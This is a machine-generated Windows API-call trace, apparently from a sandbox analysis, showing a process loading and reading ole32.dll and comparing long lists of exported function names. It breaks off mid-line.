1 [0269.449] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0269.449] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0269.449] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0269.449] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAce") returned 1 [0269.449] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAceEx") returned 1 [0269.449] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedObjectAce") returned 0 [0269.449] lstrcmpA (lpString1="AddAce", lpString2="A_SHAFinal") returned 1 [0269.449] lstrcmpA (lpString1="AddAce", lpString2="A_SHAInit") returned 1 [0269.953] GetProcessHeap () returned 0x470000 [0269.953] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2d02010 | out: hHeap=0x470000) returned 1 [0269.961] GetProcessHeap () returned 0x470000 [0269.961] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x489320 [0269.962] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x7ffc5e3e0000 [0269.963] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0269.963] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0269.964] GetModuleFileNameA (in: hModule=0x7ffc5e3e0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0269.964] CreateFileA (lpFileName="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0269.964] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0269.964] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0269.964] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1322240) returned 1 [0269.964] GetProcessHeap () returned 0x470000 [0269.964] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x142d00) returned 0x40c2040 [0269.968] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0269.968] ReadFile (in: hFile=0x140, lpBuffer=0x40c2040, nNumberOfBytesToRead=0x142d00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40c2040*, lpNumberOfBytesRead=0x14f5a4*=0x142d00, lpOverlapped=0x0) returned 1 [0270.123] CloseHandle (hObject=0x140) returned 1 [0270.123] lstrcmpA (lpString1="BindMoniker", lpString2="BindMoniker") returned 0 [0270.123] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="BindMoniker") returned 1 [0270.123] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0270.123] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0270.123] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 0 [0270.123] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="BindMoniker") returned 1 [0270.123] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0270.124] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0270.124] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0270.124] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0270.124] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0270.124] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 0 [0270.124] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="BindMoniker") returned 1 [0270.124] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0270.124] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0270.124] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0270.124] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0270.124] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0270.124] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0270.124] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0270.124] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0270.124] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSizeExt") returned 0 [0270.124] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="BindMoniker") returned 1 [0270.124] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0270.125] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0270.125] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0270.125] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0270.125] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0270.125] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0270.125] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0270.125] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0270.125] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0270.125] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0270.125] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0270.125] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 0 [0270.126] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="BindMoniker") returned 1 [0270.126] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree") returned 1 [0270.126] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree64") returned 1 [0270.126] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0270.126] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0270.126] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0270.126] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0270.126] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize") returned 1 [0270.126] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize64") returned 1 [0270.126] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0270.126] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0270.126] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0270.126] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0270.126] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromOle1Class") returned 1 [0270.126] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgID") returned 1 [0270.127] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgIDEx") returned 0 [0270.127] lstrcmpA (lpString1="CheckInitDde", lpString2="BindMoniker") returned 1 [0270.127] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree") returned -1 [0270.127] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree64") returned -1 [0270.127] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0270.127] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0270.127] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0270.127] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0270.127] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize") returned -1 [0270.127] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize64") returned -1 [0270.128] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0270.128] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0270.128] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0270.128] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0270.128] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromOle1Class") returned -1 [0270.128] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgID") returned -1 [0270.128] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgIDEx") returned -1 [0270.128] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromString") returned -1 [0270.128] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0270.128] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0270.128] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0270.128] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0270.128] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0270.128] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0270.129] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0270.129] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0270.129] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0270.129] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Connect") returned -1 [0270.129] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0270.129] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0270.129] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0270.129] lstrcmpA (lpString1="CheckInitDde", lpString2="CheckInitDde") returned 0 [0270.129] lstrcmpA (lpString1="CleanROTForApartment", lpString2="BindMoniker") returned 1 [0270.129] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree") returned -1 [0270.129] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree64") returned -1 [0270.129] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0270.130] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0270.130] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0270.130] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0270.130] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize") returned -1 [0270.130] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize64") returned -1 [0270.130] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0270.130] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0270.130] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0270.130] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0270.130] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromOle1Class") returned -1 [0270.130] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgID") returned -1 [0270.130] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgIDEx") returned -1 [0270.130] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromString") returned -1 [0270.131] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0270.131] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0270.131] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0270.131] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0270.131] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0270.131] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0270.131] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0270.131] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0270.131] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0270.131] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Connect") returned -1 [0270.131] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0270.131] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0270.131] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0270.131] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CheckInitDde") returned 1 [0270.131] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CleanROTForApartment") returned 0 [0270.132] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="BindMoniker") returned 1 [0270.132] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree") returned -1 [0270.132] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree64") returned -1 [0270.132] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0270.132] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0270.132] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0270.132] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0270.132] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize") returned -1 [0270.132] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize64") returned -1 [0270.132] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0270.132] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0270.132] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0270.132] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0270.132] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromOle1Class") returned -1 [0270.133] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgID") returned -1 [0270.133] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgIDEx") returned -1 [0270.133] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromString") returned -1 [0270.133] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0270.133] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0270.133] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0270.133] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0270.133] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0270.133] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0270.133] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0270.133] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0270.134] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0270.134] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Connect") returned -1 [0270.134] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0270.134] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0270.134] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0270.134] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CheckInitDde") returned 1 [0270.134] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CleanROTForApartment") returned 1 [0270.134] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="ClipboardProcessUninitialize") returned 0 [0270.134] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="BindMoniker") returned 1 [0270.134] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree") returned 1 [0270.134] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree64") returned 1 [0270.135] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0270.135] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0270.135] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0270.135] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0270.135] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize") returned 1 [0270.135] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize64") returned 1 [0270.135] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0270.135] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0270.135] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0270.135] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0270.135] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromOle1Class") returned 1 [0270.135] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgID") returned 1 [0270.135] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgIDEx") returned 1 [0270.135] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromString") returned 1 [0270.135] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0270.136] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0270.136] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0270.136] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0270.136] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0270.136] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0270.136] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0270.136] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0270.136] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0270.136] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Connect") returned -1 [0270.136] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0270.136] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0270.136] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0270.136] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CheckInitDde") returned 1 [0270.136] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CleanROTForApartment") returned 1 [0270.136] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="ClipboardProcessUninitialize") returned 1 [0270.136] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAddRefServerProcess") returned 1 [0270.136] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAicGetTokenForCOM") returned 0 [0270.137] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="BindMoniker") returned 1 [0270.137] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree") returned 1 [0270.137] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree64") returned 1 [0270.137] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0270.137] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0270.137] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0270.137] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0270.137] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize") returned 1 [0270.137] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize64") returned 1 [0270.137] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0270.137] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0270.137] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0270.137] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0270.137] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromOle1Class") returned 1 [0270.137] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgID") returned 1 [0270.138] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgIDEx") returned 1 [0270.138] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromString") returned 1 [0270.138] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0270.138] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0270.138] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0270.138] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0270.138] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0270.138] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0270.138] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0270.138] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0270.138] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0270.138] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Connect") returned -1 [0270.139] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0270.139] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0270.139] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0270.139] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CheckInitDde") returned 1 [0270.139] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CleanROTForApartment") returned 1 [0270.139] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="ClipboardProcessUninitialize") returned 1 [0270.139] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAddRefServerProcess") returned 1 [0270.139] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAicGetTokenForCOM") returned 1 [0270.139] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAllowSetForegroundWindow") returned 0 [0270.139] lstrcmpA (lpString1="CoBuildVersion", lpString2="BindMoniker") returned 1 [0270.139] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree") returned 1 [0270.140] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree64") returned 1 [0270.140] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0270.140] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0270.140] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0270.140] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0270.140] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize") returned 1 [0270.140] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize64") returned 1 [0270.140] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0270.140] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0270.140] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal64") 